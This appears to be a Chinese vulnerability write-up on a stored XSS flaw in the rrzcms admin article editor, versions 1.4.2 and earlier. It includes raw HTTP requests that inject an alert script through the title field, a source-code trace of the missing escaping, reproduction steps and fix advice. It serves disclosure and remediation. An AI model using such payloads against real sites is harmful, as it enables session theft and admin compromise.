系统名称及影响版本:

rrzcms <= v1.4.2

漏洞接口:

  1. 1.Xss payload插入位置接口
  2. POST /index.php/admin/Article/addArticle.html?id=&tg=0 HTTP/1.1
  3. Host: test.localhost.com
  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
  5. Accept: application/json, text/javascript, */*; q=0.01
  6. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  7. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  8. X-Requested-With: XMLHttpRequest
  9. Content-Length: 296
  10. Origin: http://test.localhost.com
  11. Connection: close
  12. Referer: http://test.localhost.com/index.php/admin/Index/index.html
  13. Cookie: PHPSESSID=60dbf579bb8f981aaacb6b903fda8453; uid=Cn0EOABnV2lSIlswUHMDNA%3D%3D; email=BHMHOwViUGQDa1oiBzcMMlIVA2NWMwRhWCQAY185BmkCJFBt; phone=BXJXawJlVWBXP1sjUWEAP1RmAmJRMFYxUjIAMQgzBjUCNFN3Uj8%3D; nickname=AHdTb1UxADRVPVoiBm8HalQ7BTUAYgFmBGdVZA42XG8ANVdgBWIGM1U2DmVWZlZrVGILawFwBWg%3D; group_id=AHdUaFcwVWtXJwhgByQCNQ%3D%3D; login_time=A3RUaAJlBjsEbFwkV2QMMFRhC2gAflQyVjEHKl1kU2QBJVZhAGBdYwZnWDVRag00VmYCcQJq; login_ip=Cn0APFY5UmwDc1oxADMCOQQtUTANcFUzUCwPPggjU2o%3D; status=VCMBPQBnAz0Dc1sxAyBUYw%3D%3D; verifytime=VzpTbwNkVmQFYgFqCjwCOlNmCm0MbQFiWDE%3D; uf=B3ALN1U3UWRSOlsjADAMLgg%2BUWQHMAcyBDdSZAlhADRXYgI3UDNUYVA6CzRXNwA%2FAzxTNQNjD29XZFBkCGMBOwc6CzhVMlFnUmVbMQA3DGQIIVEzB2cHZARiUmoJNwAgV2g%3D; think_lang=zh-cn
  15. title=%3Cscript%3Ealert(22)%3C%2Fscript%3E&subtitle=111&node_id=3&is_head=1&is_recom=0&is_special=0&is_jump=0&jump_url=&tags=&img=&author=222&view_count=0&pubtime=2022-05-06+00%3A00%3A00&ifpub=true&content=++&wap_content=++&tmpl_path=&source=&source_url=&seo_title=&seo_keywords=&seo_description=
  17. 2.Xss触发位置接口
  18. GET /index.php/admin/Article/index.html HTTP/1.1
  19. Host: test.localhost.com
  20. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
  21. Accept: */*
  22. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  23. X-Requested-With: XMLHttpRequest
  24. Connection: close
  25. Referer: http://test.localhost.com/index.php/admin/Index/index.html
  26. Cookie: PHPSESSID=60dbf579bb8f981aaacb6b903fda8453; uid=Cn0EOABnV2lSIlswUHMDNA%3D%3D; email=BHMHOwViUGQDa1oiBzcMMlIVA2NWMwRhWCQAY185BmkCJFBt; phone=BXJXawJlVWBXP1sjUWEAP1RmAmJRMFYxUjIAMQgzBjUCNFN3Uj8%3D; nickname=AHdTb1UxADRVPVoiBm8HalQ7BTUAYgFmBGdVZA42XG8ANVdgBWIGM1U2DmVWZlZrVGILawFwBWg%3D; group_id=AHdUaFcwVWtXJwhgByQCNQ%3D%3D; login_time=A3RUaAJlBjsEbFwkV2QMMFRhC2gAflQyVjEHKl1kU2QBJVZhAGBdYwZnWDVRag00VmYCcQJq; login_ip=Cn0APFY5UmwDc1oxADMCOQQtUTANcFUzUCwPPggjU2o%3D; status=VCMBPQBnAz0Dc1sxAyBUYw%3D%3D; verifytime=VzpTbwNkVmQFYgFqCjwCOlNmCm0MbQFiWDE%3D; uf=B3ALN1U3UWRSOlsjADAMLgg%2BUWQHMAcyBDdSZAlhADRXYgI3UDNUYVA6CzRXNwA%2FAzxTNQNjD29XZFBkCGMBOwc6CzhVMlFnUmVbMQA3DGQIIVEzB2cHZARiUmoJNwAgV2g%3D; think_lang=zh-cn

漏洞分析及复现:

  1. 漏洞源码位置/app/admin/controller/Article.php 第339行
    2022-05-06_142107.png
    2. 这个$data被插入到articles表中,而$data来自post提交上来的参数,如下图
    2022-05-06_142327.png
    3. 这里我们关注$data[‘title’],也就是post传递上来的title参数,这个参数到被$data接收再到$rId = M(‘articles’)->insert($data, true)这个过程中未进行任何处理。我们再来看以下接口
    2022-05-06_142833.png
    4. 直接看这个接口的116行,如下图,直接读取内容并展示出来,导致存储型XSS漏洞的产生:
    2022-05-06_142937.png
    5. 接着来复现一下,位置在管理后台—内容管理—文章管理—文章列表—添加文章。如下图:
    2022-05-06_143258.png
    6. 点击添加文章,并在文章标题中填入,其他位置随意填写,如下图:
    2022-05-06_143443.png
    7. 之后点击确认提交,跳回到文章首页则触发XSS漏洞,如下图:
    2022-05-06_143559.png

    修复建议:

  2. 对输入位置进行编码转义或者特殊符号过滤
    2. 对输出位置进行编码转义